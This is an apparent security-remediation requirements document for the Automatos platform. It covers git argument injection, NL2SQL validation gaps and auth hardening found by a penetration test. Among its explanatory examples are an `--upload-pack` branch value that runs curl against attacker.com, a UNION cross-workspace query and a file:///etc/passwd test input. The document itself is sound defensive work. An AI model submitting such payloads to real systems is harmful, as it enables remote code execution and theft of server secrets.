PRD-70: Security Hardening — Pen Test Remediation

Version: 1.0
Status: Draft (CRITICAL PRIORITY)
Priority: P0
Author: Gar Kavanagh + Auto CTO
Created: 2026-03-03
Updated: 2026-03-03
Dependencies: PRD-44 (Security Hardening Architecture, 12 of 45 stories complete), PRD-18 (Credential Management, COMPLETE), PRD-61 (NL2SQL V2, COMPLETE)
Source: Shannon AI Penetration Test Report (2026-03-03): 4.4 hours, $90.83, 12 phases completed
Branch: fix/pentest-remediation-70


Executive Summary

On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.

However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.

Independent Verification Results

I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:

| Shannon Finding | Shannon Severity | Verified Severity | Notes |
|---|---|---|---|
| 7 command injection (git clone) | CRITICAL | CRITICAL (confirmed) | 3 distinct code paths, all missing the -- separator; branch params unvalidated |
| 1 SQL injection (NL2SQL) | CRITICAL | MEDIUM (downgraded) | PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads |
| Auto-admin @automatos.app | CRITICAL | LOW (downgraded) | Backend removed this (clerk.py:196). Frontend-only; doesn't grant backend access |
| Frontend-only admin auth | CRITICAL | FALSE POSITIVE | Backend has _assert_admin() on every admin endpoint |
| 21 IDOR / authz issues | HIGH (21 items) | LOW (downgraded) | Backend consistently filters by workspace_id on all CRUD operations |
| 4 SSRF via git clone | HIGH | CRITICAL (same as cmd injection) | Same root cause as command injection findings |
| JWT audience validation | MEDIUM | MEDIUM (confirmed) | Configuration check needed |
| Generated images proxy SSRF | MEDIUM | FALSE POSITIVE (confirmed) | Next.js framework protection blocks exploitation |

Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.

What's Actually Critical

  1. Git argument injection — 3 live code paths allow RCE via --upload-pack flag injection. Authenticated users can execute arbitrary commands on the backend server.

  2. Missing -- separator — No git subprocess call uses -- to delimit options from positional arguments. URLs starting with -- are interpreted as flags.

  3. NL2SQL cross-workspace reads — The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.

  4. Database SSL not enforced — Connection strings lack sslmode=require.

  5. Frontend auto-admin remnant: role-context.tsx:44-48 still grants admin UI to @automatos.app emails even though the backend ignores it.


1. Findings Detail

1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.
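The following deliberately simplified model makes the missing-separator problem concrete. It assumes a getopt-style rule: before a bare `--`, any argument starting with `-` is read as an option, wherever it appears, and after `--` everything is positional. `options_seen_by_git` is a hypothetical illustration that ignores option values and other parser details. It is not git's actual parser.

```python
from typing import List


def options_seen_by_git(argv: List[str]) -> List[str]:
    """Simplified model: return the arguments that would be parsed as options.

    Before a bare "--", anything starting with "-" counts as an option;
    after it, every argument is positional. Option values are ignored.
    """
    options = []
    for arg in argv[2:]:  # skip "git" and the subcommand
        if arg == "--":
            break  # end of options: the rest are positional
        if arg.startswith("-"):
            options.append(arg)
    return options


malicious_url = "--upload-pack=touch /tmp/pwned"

# Vulnerable: the URL is passed as a bare positional argument.
vulnerable = ["git", "clone", "--depth", "1", malicious_url, "/tmp/dest"]
# Hardened: "--" separates options from positional arguments.
hardened = ["git", "clone", "--depth", "1", "--", malicious_url, "/tmp/dest"]

print(options_seen_by_git(vulnerable))  # ['--depth', '--upload-pack=touch /tmp/pwned']
print(options_seen_by_git(hardened))    # ['--depth']
```

The `--` separator only changes how positional arguments are parsed. It does not validate them, so the URL and branch checks in FIX-01 are still needed.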

Path A: Skills Import (skill_loader.py) — HIGHEST RISK

Critical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins which require admin approval + security scan).

What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.

What's NOT validated:

  • branch parameter — no validation at all. --upload-pack='bash -c "curl attacker.com"' as branch value gives RCE.

  • No -- separator before positional git_url argument

Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.

Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.

Path B: CodeGraph Indexing (codegraph_service.py) — KEEP BUT SECURE

What's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url — no URL parsing, no domain check, no protocol check.

What works well:

  • Workspace scoping is enforced at DB level — all codegraph tables filter by workspace_id

  • Clones into tempfile.mkdtemp() — cleaned up on success and failure

  • Duplicate prevention — won't re-index if status is already "indexing"

What needs fixing:

  • Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only — this IS a code indexing tool)

  • Add branch validation (no leading -)

  • GitPython's Repo.clone_from() passes branch to git CLI — same injection risk

  • Auth token injected into URL at line 452 — if exception leaks the URL, token is exposed
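For the token-leak item, one mitigation is to mask credentials whenever the authenticated URL could reach a log line or an error message. This is a minimal sketch. It assumes the token is embedded as URL userinfo (for example `https://<token>@github.com/...`); `redact_url` and `clone_error_message` are hypothetical helper names.

```python
from urllib.parse import urlsplit, urlunsplit


def redact_url(url: str) -> str:
    """Return the URL with any embedded userinfo (user, password or token) masked."""
    parts = urlsplit(url)
    if parts.username is None and parts.password is None:
        return url  # nothing to hide
    host = parts.hostname or ""
    if parts.port is not None:
        host = f"{host}:{parts.port}"
    # Keep host and path so the message is still useful for debugging.
    return urlunsplit((parts.scheme, f"***@{host}", parts.path, parts.query, parts.fragment))


def clone_error_message(url: str, exc: Exception) -> str:
    # Avoid str(exc): git errors can echo the full command line, including the URL.
    return f"clone of {redact_url(url)} failed: {type(exc).__name__}"


print(redact_url("https://ghp_secret@github.com/org/repo.git"))
# https://***@github.com/org/repo.git
```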

Path C: Workspace GitHub Clone (workspace_github.py) — BEST ISOLATED

Already well-secured:

  • CloneRequest Pydantic model has @field_validator("repo_url") — validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentials

  • Runs in separate workspace-worker container (not the backend server)

  • Per-workspace filesystem isolation (/workspaces/{workspace_id}/)

  • Backend has read-only mount; worker has read-write

  • Command whitelist blocks sudo, su, mount, etc.

  • Path traversal prevention via resolve_safe_path()

  • 5GB quota per workspace

  • Workspace access verified at line 180

What still needs fixing:

  • branch parameter has no validation — same leading - injection risk

  • Worker's git clone command doesn't use -- separator

  • These are lower severity because the worker container has limited blast radius vs. the backend server

Path D: Plugin Harvest Script (harvest_plugins.py)

Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.

1.2 MEDIUM: NL2SQL Validator Gaps

Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."

Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.

What IS still vulnerable:

  1. UNION cross-workspace reads: SELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. There are no mutations, so it passes all keyword checks. The table allowlist helps (lines 214-223 validate tables against schema metadata), but if the NL2SQL data source includes shared tables like users or workspace_members, cross-workspace reads are possible.

  2. RETURNING not in deny list: RETURNING only appears on data-modifying statements such as INSERT, UPDATE, and DELETE, so denying it adds a second tripwire. Today, a mutation form that slips past the existing keywords but carries RETURNING would not be caught.

  3. Regex fundamentally can't parse SQL: edge cases will always exist. AST-based parsing is the correct approach.
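Item 1 is easy to reproduce against any keyword-only deny list. The sketch below approximates the approach described above: strip string literals, then search for deny keywords. The regexes and the keyword subset are illustrative assumptions, not a copy of `validator.py`.

```python
import re

# Illustrative subset of a mutation deny list (not the real DENY_KEYWORDS).
DENY_PATTERNS = [r"\bINSERT\b", r"\bUPDATE\b", r"\bDELETE\b", r"\bDROP\b", r"\bALTER\b"]


def strip_string_literals(sql: str) -> str:
    # Collapse '...' literals (including '' escapes) so keywords inside strings are ignored.
    return re.sub(r"'(?:[^']|'')*'", "''", sql)


def passes_keyword_check(sql: str) -> bool:
    cleaned = strip_string_literals(sql)
    return not any(re.search(p, cleaned, re.IGNORECASE) for p in DENY_PATTERNS)


nested_mutation = "SELECT * FROM (INSERT INTO users VALUES (1) RETURNING *) t"
cross_workspace = (
    "SELECT * FROM users WHERE workspace_id = 'mine' "
    "UNION SELECT * FROM users WHERE workspace_id = 'theirs'"
)

print(passes_keyword_check(nested_mutation))  # False: INSERT is caught even when nested
print(passes_keyword_check(cross_workspace))  # True: no mutation keyword, so it passes
```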

Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.

1.3 LOW: Frontend Auto-Admin Remnant

Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."

Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.

Should still be fixed: Remove the frontend check to prevent confusion and to align with the principle that security decisions never happen in the frontend.

1.4 FALSE POSITIVES (Shannon Overcounts)

21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:

  • agents.py:611 filters on Agent.workspace_id == ctx.workspace_id

  • documents.py:501 filters on Document.workspace_id == ctx.workspace_id

  • workflows.py:387 filters on Workflow.workspace_id == ctx.workspace_id

  • channels.py — parameterized workspace_id in raw SQL

  • Admin endpoints — _assert_admin() on every handler

  • Chat endpoints — user_id ownership checks

Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.

Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.
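For reference, the backend check described above reduces to a role test that never looks at the email domain. This is a minimal sketch. `RequestContext`, `User`, `ForbiddenError`, and `require_admin` are hypothetical stand-ins that mirror `_assert_admin()`; the real handlers return HTTP 403.

```python
from dataclasses import dataclass

ADMIN_ROLES = frozenset({"admin", "super_admin"})


class ForbiddenError(Exception):
    """Stand-in for the HTTP 403 response the real endpoints return."""


@dataclass
class User:
    email: str
    system_role: str  # taken from the verified Clerk JWT


@dataclass
class RequestContext:
    user: User
    workspace_id: str


def require_admin(ctx: RequestContext) -> None:
    """Raise unless the caller holds an admin role; the email domain plays no part."""
    if ctx.user.system_role not in ADMIN_ROLES:
        raise ForbiddenError("admin role required")


# An @automatos.app address without an admin role is still rejected.
regular = RequestContext(User("someone@automatos.app", "user"), "ws-1")
admin = RequestContext(User("ops@example.com", "admin"), "ws-1")
require_admin(admin)  # passes silently
try:
    require_admin(regular)
except ForbiddenError as exc:
    print("403:", exc)  # 403: admin role required
```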

1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

| Gap | Current State | Risk |
|---|---|---|
| Database SSL | No sslmode in DATABASE_URL | Data travels unencrypted between backend and Postgres |
| Redis TLS | No TLS configured | Cached data (sessions, rate limits) travels unencrypted |
| Redis dangerous commands | FLUSHDB, FLUSHALL, CONFIG available | If Redis is exposed, a full data wipe is possible |
| Audit service | Stub file (199 bytes, no implementation) | No audit trail for security-sensitive operations |
| JWT audience validation | Optional; may not be configured | Cross-Clerk-app JWT reuse if CLERK_AUDIENCE is unset |


2. Remediation Plan

Phase 1: Critical Fixes (Week 1) — Stop the Bleeding

These fixes prevent RCE on the backend server. Ship immediately.

FIX-01: Secure Git Operations (ALL code paths)

Create: orchestrator/core/security/git_sanitizer.py

Modify files:

| File | Change | Priority |
|---|---|---|
| api/skills.py | Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built. | P0 |
| modules/agents/services/skill_loader.py | Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone(). | P0 |
| modules/codegraph/codegraph_service.py | Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool; only git hosts make sense). | P0 |
| api/workspace_github.py | Add validate_branch() before building task step. URL already validated by Pydantic model. | P1 |
| services/workspace-worker/executor.py | Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch(). | P1 |
| scripts/harvest_plugins.py | Add validate_git_url() before clone_repo(). Use build_git_clone_cmd(). | P2 |

Key principles:

  • Every git URL is validated: HTTPS only, domain allowlist, no leading -

  • Every branch name is validated: alphanumeric + ./_-, no leading -

  • Every subprocess.run git call uses -- separator before positional args

  • One module, one import — no per-file reimplementation

  • Skills import locked to admin-only (matches plugin import pattern)
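Here is a minimal sketch of what `git_sanitizer.py` could look like under the principles above. The names `validate_git_url`, `validate_branch`, and `build_git_clone_cmd` come from this PRD. Their signatures, the `GitInputError` exception, and the 255-character branch cap are assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit

ALLOWED_GIT_HOSTS = frozenset({"github.com", "gitlab.com", "bitbucket.org"})
# Letters, digits and . / _ - (the character set from the key principles).
_BRANCH_RE = re.compile(r"[A-Za-z0-9./_-]+")
MAX_BRANCH_LEN = 255  # assumption: a generous cap, not a git-defined limit


class GitInputError(ValueError):
    """Untrusted git input was rejected; API handlers would map this to HTTP 400."""


def validate_git_url(url: str) -> str:
    """Accept only credential-free https:// URLs on an allowlisted host."""
    url = url.strip()
    if url.startswith("-"):
        raise GitInputError("URL must not start with '-'")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        raise GitInputError("URL must not contain whitespace or control characters")
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise GitInputError("only https:// URLs are allowed")
    if "@" in parts.netloc:
        raise GitInputError("credentials must not be embedded in the URL")
    if parts.hostname not in ALLOWED_GIT_HOSTS:
        raise GitInputError(f"host not allowed: {parts.hostname!r}")
    return url


def validate_branch(branch: str) -> str:
    """Accept branch names of letters, digits and . / _ - with no leading '-'."""
    if not branch or len(branch) > MAX_BRANCH_LEN:
        raise GitInputError(f"branch must be 1-{MAX_BRANCH_LEN} characters")
    if branch.startswith("-"):
        raise GitInputError("branch must not start with '-'")
    if not _BRANCH_RE.fullmatch(branch):
        raise GitInputError("branch may only contain letters, digits and . / _ -")
    return branch


def build_git_clone_cmd(url: str, dest: str, branch: Optional[str] = None) -> List[str]:
    """Build an argv list for subprocess.run (no shell), with '--' before positionals."""
    cmd = ["git", "clone"]
    if branch is not None:
        cmd += ["--branch", validate_branch(branch)]
    cmd += ["--", validate_git_url(url), dest]
    return cmd
```

Callers would pass the returned list straight to `subprocess.run(..., check=True)` without `shell=True`, and translate `GitInputError` into the 400 response the integration tests expect. On the GitPython path in codegraph_service.py, the same two validators would run before `Repo.clone_from()`.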

FIX-02: Remove Frontend Auto-Admin

Modify: frontend/contexts/role-context.tsx

Delete lines 44-49 (the @automatos.app domain check). Admin role should come exclusively from Clerk publicMetadata.role.

FIX-03: Enforce JWT Audience Validation

Modify: orchestrator/core/auth/clerk.py

Ensure CLERK_AUDIENCE is set and validated, and add a startup check that refuses to boot when it is missing.
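A minimal sketch of the startup check, assuming configuration is read from environment variables at process start. `check_clerk_audience` and `ConfigError` are hypothetical names. Verifying the `aud` claim on each token would still happen in the JWT decode path in clerk.py.

```python
import os
from typing import Mapping, Optional


class ConfigError(RuntimeError):
    """Raised at startup when security-critical configuration is missing."""


def check_clerk_audience(env: Optional[Mapping[str, str]] = None) -> str:
    # Read the real environment unless a mapping is injected (useful in tests).
    env = os.environ if env is None else env
    audience = env.get("CLERK_AUDIENCE", "").strip()
    if not audience:
        # Without an audience, JWTs issued for another Clerk app could be accepted.
        raise ConfigError("CLERK_AUDIENCE must be set; refusing to start")
    return audience
```

Calling this before the app starts serving makes a misconfigured deployment fail loudly instead of silently skipping audience validation.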

Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.

Phase 2: Defense in Depth (Week 2) — Harden the Perimeter

FIX-04: NL2SQL Query Hardening

Modify: orchestrator/modules/nl2sql/query/validator.py

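  1. Add RETURNING to the deny list, together with COPY and EXECUTE (see the file impact table).

  2. Enforce workspace isolation at the SQL level, so that a generated query cannot read rows belonging to another workspace (for example via UNION).

  3. Add CTE detection.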

  4. Future: Replace regex with AST parsing (Phase 3). Use sqlglot or pglast to parse SQL into an AST and validate the tree structure rather than string patterns.
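The following is a minimal sketch of interim regex-level checks for items 1 and 3. It assumes the validator strips string literals before matching. The keyword list is illustrative apart from the RETURNING/COPY/EXECUTE additions. Rejecting set operations such as UNION is one conservative stopgap that matches the integration test expecting a validation error. It does not by itself enforce the workspace filter from item 2. Like any regex approach, it has edge cases (item 4).

```python
import re
from typing import List

# Mutation/exec keywords; RETURNING, COPY and EXECUTE are the FIX-04 additions.
DENY_KEYWORDS = ("INSERT", "UPDATE", "DELETE", "DROP", "ALTER", "TRUNCATE",
                 "RETURNING", "COPY", "EXECUTE")
_DENY_RE = re.compile(r"\b(" + "|".join(DENY_KEYWORDS) + r")\b", re.IGNORECASE)
_SET_OP_RE = re.compile(r"\b(UNION|INTERSECT|EXCEPT)\b", re.IGNORECASE)
# Matches "WITH name [(cols)] AS" but not casts such as "with time zone".
_CTE_RE = re.compile(r"\bWITH\s+(?:RECURSIVE\s+)?\w+\s*(?:\([^)]*\))?\s*AS\b", re.IGNORECASE)
_LITERAL_RE = re.compile(r"'(?:[^']|'')*'")


def validate_generated_sql(sql: str) -> List[str]:
    """Return the reasons a generated query is rejected (empty list = accepted)."""
    # Comments can hide quote characters and confuse literal stripping: reject them.
    if "--" in sql or "/*" in sql:
        return ["SQL comments are not allowed"]
    cleaned = _LITERAL_RE.sub("''", sql)  # keywords inside string literals don't count
    problems = [f"forbidden keyword: {m.group(1).upper()}" for m in _DENY_RE.finditer(cleaned)]
    if _SET_OP_RE.search(cleaned):
        problems.append("set operations (UNION/INTERSECT/EXCEPT) are not allowed")
    if _CTE_RE.search(cleaned):
        problems.append("common table expressions (WITH ... AS) are not allowed")
    return problems
```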

FIX-05: Database Connection Security

Modify: orchestrator/config.py and docker-compose.yml

  1. Add sslmode=require to DATABASE_URL.

  2. Disable Redis dangerous commands (FLUSHDB, FLUSHALL, CONFIG) in docker-compose.yml.

    Note: CONFIG rename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.
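For item 1, this is a minimal sketch of normalizing DATABASE_URL when the config is loaded. It assumes a standard `postgresql://` URL whose `sslmode` query parameter is honored by the driver in use. `require_ssl` is a hypothetical helper name.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

STRONG_SSL_MODES = {"require", "verify-ca", "verify-full"}


def require_ssl(database_url: str) -> str:
    """Return database_url with sslmode=require unless a stronger mode is already set."""
    parts = urlsplit(database_url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    if params.get("sslmode") not in STRONG_SSL_MODES:
        params["sslmode"] = "require"  # overrides disable/allow/prefer or a missing value
    return urlunsplit(parts._replace(query=urlencode(params)))


print(require_ssl("postgresql://app:pw@db:5432/app"))
# postgresql://app:pw@db:5432/app?sslmode=require
```

Note that `require` encrypts the connection but does not verify the server certificate. `verify-full` also checks the certificate and hostname, which is why the helper leaves it untouched.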

FIX-06: Audit Service Implementation

Modify: orchestrator/core/services/audit_service.py

The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations.

Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.
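A minimal sketch of the event shape and write path, assuming a DB-API connection and an audit_logs table with one column per field listed above. The real schema's column names and types may differ, and placeholder style varies by driver (sqlite3 uses `?`, most Postgres drivers use `%s`). The in-memory SQLite table exists only to make the sketch runnable.

```python
import json
import sqlite3
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Any, Dict, Optional


@dataclass
class AuditEvent:
    user_id: str
    workspace_id: Optional[str]
    event_type: str  # hypothetical naming, e.g. "skills.git_import"
    result: str      # "success" or "failure"
    resource_id: Optional[str] = None
    ip_address: Optional[str] = None
    user_agent: Optional[str] = None
    metadata: Dict[str, Any] = field(default_factory=dict)
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())


_INSERT_SQL = (
    "INSERT INTO audit_logs (timestamp, user_id, workspace_id, event_type, resource_id, "
    "ip_address, user_agent, result, metadata) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)"
)


def write_audit_event(conn: sqlite3.Connection, event: AuditEvent) -> None:
    """Persist one event with a parameterized INSERT; metadata is stored as JSON text."""
    conn.execute(_INSERT_SQL, (
        event.timestamp, event.user_id, event.workspace_id, event.event_type,
        event.resource_id, event.ip_address, event.user_agent, event.result,
        json.dumps(event.metadata, sort_keys=True),
    ))
    conn.commit()


# Usage against a throwaway in-memory table (hypothetical schema).
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE audit_logs (timestamp TEXT, user_id TEXT, workspace_id TEXT, event_type TEXT, "
    "resource_id TEXT, ip_address TEXT, user_agent TEXT, result TEXT, metadata TEXT)"
)
write_audit_event(conn, AuditEvent(
    user_id="u-1", workspace_id="ws-1", event_type="skills.git_import",
    result="failure", metadata={"reason": "invalid branch"},
))
```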

Phase 3: Proactive Security (Weeks 3-4)

FIX-07: Rate Limiting per Workspace

Modify: Rate limiting configuration

Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:

| Operation | Rate Limit |
|---|---|
| Git clone (any path) | 5/hour per workspace |
| NL2SQL query | 30/min per workspace |
| Admin operations | 20/min per user |
| Plugin/skill import | 3/hour per workspace |
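The following is a minimal in-memory sketch of fixed-window limits using the numbers in the table. It assumes a single process. With several backend instances, the counters would need shared storage such as the existing Redis. The operation keys are hypothetical names.

```python
import time
from typing import Callable, Dict, Tuple

# (max requests, window in seconds) from the FIX-07 table; key names are hypothetical.
LIMITS: Dict[str, Tuple[int, int]] = {
    "git_clone": (5, 3600),            # per workspace
    "nl2sql_query": (30, 60),          # per workspace
    "admin_op": (20, 60),              # per user
    "plugin_skill_import": (3, 3600),  # per workspace
}


class FixedWindowLimiter:
    """Counts requests per (operation, subject) within fixed time windows."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self._clock = clock
        # (operation, subject_id) -> (window index, requests seen in that window)
        self._state: Dict[Tuple[str, str], Tuple[int, int]] = {}

    def allow(self, operation: str, subject_id: str) -> bool:
        """subject_id is the workspace_id, or the user_id for admin_op."""
        limit, window = LIMITS[operation]
        current = int(self._clock() // window)
        win, count = self._state.get((operation, subject_id), (current, 0))
        if win != current:
            count = 0  # a new window has started: reset the counter
        if count >= limit:
            return False
        self._state[(operation, subject_id)] = (current, count + 1)
        return True


# Usage with a fake clock: the sixth clone in the same hour is refused.
now = [0.0]
limiter = FixedWindowLimiter(clock=lambda: now[0])
print([limiter.allow("git_clone", "ws-1") for _ in range(6)])
# [True, True, True, True, True, False]
```

Fixed windows are simple, but they allow a burst of up to twice the limit across a window boundary. A sliding window or token bucket smooths this if it matters for git clones.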

FIX-08: CSP and Security Headers

Modify: frontend/middleware.ts or Next.js config

Verify and enforce:

  • Content-Security-Policy — restrict script sources, prevent inline scripts

  • X-Content-Type-Options: nosniff

  • X-Frame-Options: DENY

  • Referrer-Policy: strict-origin-when-cross-origin

  • Permissions-Policy — disable unused browser features

FIX-09: Dependency Audit

Run pip-audit (Python) and npm audit / yarn audit (frontend) to identify known CVEs in dependencies. Fix or pin affected packages.

FIX-10: Scheduled Shannon Re-Test

After all fixes are deployed, re-run Shannon with authenticated test credentials to:

  1. Verify all injection paths are blocked

  2. Test IDOR/authz with actual authenticated sessions

  3. Validate workspace isolation under adversarial conditions


3. File Impact Table

New Files

| File | Fix | Description |
|---|---|---|
| orchestrator/core/security/__init__.py | FIX-01 | Security utilities package |
| orchestrator/core/security/git_sanitizer.py | FIX-01 | Centralized git URL/branch validation |
| orchestrator/tests/security/test_git_sanitizer.py | FIX-01 | Unit tests for git sanitizer |
| orchestrator/tests/security/test_nl2sql_validator.py | FIX-04 | Adversarial SQL injection test cases |

Modified Files

| File | Fix | Change |
|---|---|---|
| orchestrator/api/skills.py | FIX-01 | Add _assert_admin() to skills git import endpoint; admin-only until safe user flow exists |
| orchestrator/modules/agents/services/skill_loader.py | FIX-01 | Replace inline validation with git_sanitizer imports; add -- separator; add branch validation |
| orchestrator/modules/codegraph/codegraph_service.py | FIX-01 | Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist |
| orchestrator/api/workspace_github.py | FIX-01 | Add branch validation before task submission (URL already validated by Pydantic) |
| services/workspace-worker/executor.py | FIX-01 | Add -- separator + branch validation in _git_clone() handler |
| orchestrator/scripts/harvest_plugins.py | FIX-01 | Add URL validation; use build_git_clone_cmd() |
| frontend/contexts/role-context.tsx | FIX-02 | Remove @automatos.app auto-admin logic |
| orchestrator/core/auth/clerk.py | FIX-03 | Enforce CLERK_AUDIENCE validation |
| orchestrator/config.py | FIX-03, FIX-05 | Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL |
| orchestrator/modules/nl2sql/query/validator.py | FIX-04 | Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection |
| docker-compose.yml | FIX-05 | Disable Redis dangerous commands |
| orchestrator/core/services/audit_service.py | FIX-06 | Implement actual audit logging (replace stub) |


4. Test Plan

Unit Tests (FIX-01: Git Sanitizer)

Unit Tests (FIX-04: NL2SQL Hardening)

Integration Tests

| Test | Expected Result |
|---|---|
| Submit skills import with --upload-pack as branch | Returns 400, not 500 or RCE |
| Submit codegraph index with file:///etc/passwd as URL | Returns 400 |
| Submit workspace clone with internal IP as URL | Returns 400 |
| Admin endpoint without admin role | Returns 403 (backend enforced) |
| NL2SQL with UNION cross-workspace query | Returns validation error |

Regression Test (Post-Deploy)

Re-run Shannon with authenticated test credentials. Provide:

  • 2 test accounts in different workspaces (for IDOR testing)

  • 1 admin account (for vertical escalation testing)

  • 1 regular user account (for privilege escalation testing)


5. Deployment Checklist

Pre-Deploy (Environment Config)

Deploy Order

  1. FIX-01 (git sanitizer) — Ship first, blocks RCE

  2. FIX-02 (frontend auto-admin removal) — Quick frontend deploy

  3. FIX-03 (JWT audience) — Config change + code

  4. FIX-04 (NL2SQL hardening) — Backend deploy

  5. FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window

  6. FIX-06 (audit service) — Backend deploy

  7. FIX-07 through FIX-09 — Iterative hardening

Post-Deploy Verification


6. Architecture Context: Why Each Path Has Different Risk

Understanding the isolation model changes the severity assessment:

Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.

Skills vs. Plugins: The Access Control Gap

| Aspect | Skills (PRD-22) | Plugins (PRD-42) |
|---|---|---|
| Import endpoint | POST /api/v1/skills/sources/git | POST /api/admin/plugins/import-github |
| Auth requirement | Any authenticated user | Admin only (_assert_admin()) |
| Security scan | Basic pattern matching (8 patterns) | Full static + LLM-based scan |
| Approval workflow | None; auto-activated | Admin approval required |
| Activation scope | Global (all workspaces) | Per-workspace enablement |
| Assignment | Direct to any agent | Via AgentAssignedPlugin |

The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and breaks the chain from any authenticated user to RCE. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.


7. Shannon Assessment Quality Notes

Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:

Strengths:

  • Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)

  • Thorough injection analysis — identified every git clone code path

  • Good methodology — proof-by-exploitation focus, no assumptions

  • Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)

Limitations:

  • Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)

  • Overcounted authorization issues (21) that were actually properly implemented in the backend

  • Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries

  • Auto-admin finding was based on frontend code only — didn't verify backend enforcement

Recommendation: Next Shannon run should:

  1. Be given read access to the actual orchestrator/ Python source

  2. Be provided authenticated test credentials (bypass waitlist)

  3. Run an internal-scope test focused on the 21 authz items that couldn't be tested externally
